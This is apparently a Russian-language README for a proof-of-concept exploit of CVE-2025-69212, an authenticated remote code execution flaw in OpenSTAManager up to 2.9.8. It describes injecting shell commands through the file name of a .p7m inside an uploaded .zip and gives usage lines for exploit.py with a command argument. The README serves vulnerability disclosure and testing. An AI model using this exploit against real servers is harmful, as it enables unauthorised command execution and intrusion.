
CVE-2025-69212 Proof-of-concept.
OpenSTAManager — это программное решение для управления технической поддержкой, электронным выставлением счетов и бухгалтерским учётом. Версии <=2.9.8 уязвимы к удалённому выполнению кода после аутентификации. Злоумышленник может воспользоваться этой уязвимостью, загрузив специально созданный архив .zip, содержащий файл .p7m, имя которого может быть интерпретировано как команды оболочки, что приводит к произвольному выполнению команд на удалённом сервере.
$ pip install requests
$ python3 exploit.py [-h] --user USER --password PASSWORD [--target TARGET] [--cmd CMD]
Пример:
$ python3 exploit.py --user="admin" --password="admin" --target="http://example.com/" --cmd="id"
-h, --help show this help message and exit
--user USER username for auth.
--password PASSWORD password for auth.
--target TARGET target domain endpoint
--cmd CMD command to execute on the server